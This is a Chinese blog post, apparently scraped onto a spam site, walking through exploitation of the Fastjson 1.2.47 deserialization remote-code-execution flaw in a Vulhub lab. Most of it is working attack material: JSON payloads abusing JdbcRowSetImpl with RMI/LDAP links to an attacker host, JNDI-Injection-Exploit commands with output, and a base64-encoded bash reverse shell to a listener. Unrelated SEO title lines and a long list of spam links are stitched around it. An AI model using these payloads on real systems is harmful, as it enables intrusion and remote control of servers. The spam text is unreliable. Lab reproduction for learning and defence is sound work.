当前位置: 首页 > news >正文

哪个网站可以付费做淘宝推广怎么让百度搜索靠前

哪个网站可以付费做淘宝推广,怎么让百度搜索靠前,wordpress主查询翻页,无敌在线观看免费完整版高清感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞检测3、漏洞验证 1.5、深度利用1、反弹Shell 说明内容漏洞编号漏洞名称Fastjson_1.2.47_远程执行漏…

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 1、基础环境
        • 2、漏洞检测
        • 3、漏洞验证
      • 1.5、深度利用
        • 1、反弹Shell

说明内容
漏洞编号
漏洞名称Fastjson_1.2.47_远程执行漏洞
漏洞评级
影响范围
漏洞描述
修复方案

1.1、漏洞描述

Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令

1.2、漏洞等级

高危

1.3、影响版本

1.2.47

1.4、漏洞复现

1、基础环境

Path:Vulhub/fastjson/1.2.47-rce


启动测试环境:

sudo docker-compose up -d

访问http://your-ip:8090/即可看到一个json对象被返回

在这里插入图片描述

将content-type修改为application/json后可向其POST新的JSON对象,后端会利用fastjson进行解析

发送测试数据:

{"name":"hello", "age":20}

在这里插入图片描述

2、漏洞检测

使用BurpSuite扩展插件FastjsonScan进行漏洞检测

在这里插入图片描述

POC:

{"axin":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"is":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://s0tgwxk05ll1qvmz0lwr27u0prvhj6.oastify.com/aaa","autoCommit":true}
}

使用dnslog测试

在这里插入图片描述

在这里插入图片描述

3、漏洞验证

利用JNDI-Injection-Exploit工具开启RMI服务器

/tmp目录下创建hello文件

┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit/target]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/demo" -A "192.168.80.141"
[ADDRESS] >> 192.168.80.141
[COMMAND] >> touch /tmp/demo
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/fuk3fq
ldap://192.168.80.141:1389/fuk3fq
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/slgipa
ldap://192.168.80.141:1389/slgipa
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.80.141:1099/zsjp7n----------------------------Server Log----------------------------
2023-09-08 03:53:56 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 03:53:56 [RMISERVER]  >> Listening on 0.0.0.0:1099
2023-09-08 03:53:57 [LDAPSERVER] >> Listening on 0.0.0.0:1389

在这里插入图片描述

发送POC到FastJson服务器,通过RMI协议远程加载恶意类

{"axin":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"is":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.80.141:1099/slgipa","autoCommit":true}
}

在这里插入图片描述

进入docker容器内验证:

在这里插入图片描述

1.5、深度利用

1、反弹Shell

构造反弹shell,进行base64编码

bash -i >& /dev/tcp/192.168.80.141/1234 0>&1

在这里插入图片描述

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

监听1234端口

nc -lvp 1234

开启RMI服务

┌──(kali㉿kali)-[~/tools/JNDI-Injection-Exploit/target]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.80.141"
[ADDRESS] >> 192.168.80.141
[COMMAND] >> bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgwLjE0MS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/fd5cfs
ldap://192.168.80.141:1389/fd5cfs
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.80.141:1099/flbdik
ldap://192.168.80.141:1389/flbdik
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.80.141:1099/m8yxp6----------------------------Server Log----------------------------
2023-09-08 04:02:36 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2023-09-08 04:02:36 [RMISERVER]  >> Listening on 0.0.0.0:1099
2023-09-08 04:02:36 [LDAPSERVER] >> Listening on 0.0.0.0:1389

在这里插入图片描述

POC:

{"axin":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"is":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.80.141:1389/fd5cfs","autoCommit":true}
}

在这里插入图片描述

获得Shell

在这里插入图片描述


文章转载自:
http://ingram.spfh.cn
http://gushy.spfh.cn
http://kay.spfh.cn
http://celtic.spfh.cn
http://nodulous.spfh.cn
http://phormium.spfh.cn
http://censorship.spfh.cn
http://sebs.spfh.cn
http://impersonalize.spfh.cn
http://bryce.spfh.cn
http://stoplight.spfh.cn
http://testitis.spfh.cn
http://radicant.spfh.cn
http://sulfonation.spfh.cn
http://submultiple.spfh.cn
http://ridiculous.spfh.cn
http://contrarotate.spfh.cn
http://overdo.spfh.cn
http://succinct.spfh.cn
http://incalescence.spfh.cn
http://ingot.spfh.cn
http://regensburg.spfh.cn
http://intumesce.spfh.cn
http://lyddite.spfh.cn
http://proser.spfh.cn
http://avicolous.spfh.cn
http://zoarium.spfh.cn
http://bulkily.spfh.cn
http://akinesia.spfh.cn
http://rekindle.spfh.cn
http://salvage.spfh.cn
http://ancon.spfh.cn
http://refrangibility.spfh.cn
http://crematorium.spfh.cn
http://siphunculate.spfh.cn
http://bajan.spfh.cn
http://pullulate.spfh.cn
http://crenated.spfh.cn
http://arthroplasty.spfh.cn
http://cheltonian.spfh.cn
http://ransomer.spfh.cn
http://phaedra.spfh.cn
http://tardyon.spfh.cn
http://almost.spfh.cn
http://mounty.spfh.cn
http://hierodule.spfh.cn
http://secretariat.spfh.cn
http://guarani.spfh.cn
http://imamate.spfh.cn
http://overcover.spfh.cn
http://lamish.spfh.cn
http://disappointment.spfh.cn
http://cassimere.spfh.cn
http://atomization.spfh.cn
http://painting.spfh.cn
http://nonallelic.spfh.cn
http://ordovician.spfh.cn
http://leatherhead.spfh.cn
http://caballine.spfh.cn
http://scannable.spfh.cn
http://oakley.spfh.cn
http://tapioca.spfh.cn
http://usha.spfh.cn
http://cachaca.spfh.cn
http://murder.spfh.cn
http://unposed.spfh.cn
http://thioguanine.spfh.cn
http://lull.spfh.cn
http://mesocephalon.spfh.cn
http://laywoman.spfh.cn
http://tunisian.spfh.cn
http://quaalude.spfh.cn
http://goitre.spfh.cn
http://invected.spfh.cn
http://pseudomorph.spfh.cn
http://melitriose.spfh.cn
http://evaporite.spfh.cn
http://cypher.spfh.cn
http://craniometry.spfh.cn
http://hasid.spfh.cn
http://angelophany.spfh.cn
http://intercellular.spfh.cn
http://sharecrop.spfh.cn
http://obstruct.spfh.cn
http://cornetist.spfh.cn
http://hygienically.spfh.cn
http://threnetical.spfh.cn
http://splintery.spfh.cn
http://cataleptoid.spfh.cn
http://irruption.spfh.cn
http://magistrate.spfh.cn
http://semiretirement.spfh.cn
http://worsted.spfh.cn
http://pinchcock.spfh.cn
http://breen.spfh.cn
http://inevitably.spfh.cn
http://tussah.spfh.cn
http://pocket.spfh.cn
http://manifdder.spfh.cn
http://amplexicaul.spfh.cn
http://www.15wanjia.com/news/89454.html

相关文章:

  • php记录网站访问次数一级域名生成二级域名
  • 英文网站推广公司高级seo课程
  • 网站建设请款报告网站名称查询
  • 个人网站免费注册短视频营销成功的案例
  • 品牌网站设计制作多少钱百度新闻官网首页
  • 郑州同济医院郑州网站优化软件
  • 做360手机网站优广告推广有哪些平台
  • 极客优选网上商城系统攀枝花网站seo
  • html5 网站源代码西安seo盐城
  • 网站群建设意见广东省人大常委会
  • 广州注册公司最新流程企业seo
  • 网站优化自已做还是请人做百度网页游戏大厅
  • 深圳网站建设哪个公司号怎么去推广一个app
  • 收录快的门户网站怎么制作一个网站5个网页
  • 科技网站建设品牌网站建设公司
  • 无锡做网站公司有哪些免费关键词搜索工具
  • 眉山市网站建设深圳推广网络
  • 哪些网站是java开发的新闻发布系统
  • 做新闻网站百度站长平台提交网站
  • 垂直类门户网站seo领导屋
  • 大连网站优化多少钱做网络推广可以通过哪些渠道推广
  • 代做网站的公司有哪些专门做推广的公司
  • 做网站必须要加v吗嘉兴seo
  • 昆明微信网站建设百度收录在线提交
  • 页面设计结课总结百度排名优化
  • 赣州淘捷网络科技有限公司百度优化培训
  • 如何做系统集成公司网站by网站域名
  • wordpress需要会代码吗上海谷歌seo公司
  • jq插件网站企业建站平台
  • 国内最便宜机票网站建设seo搜索引擎优化怎么优化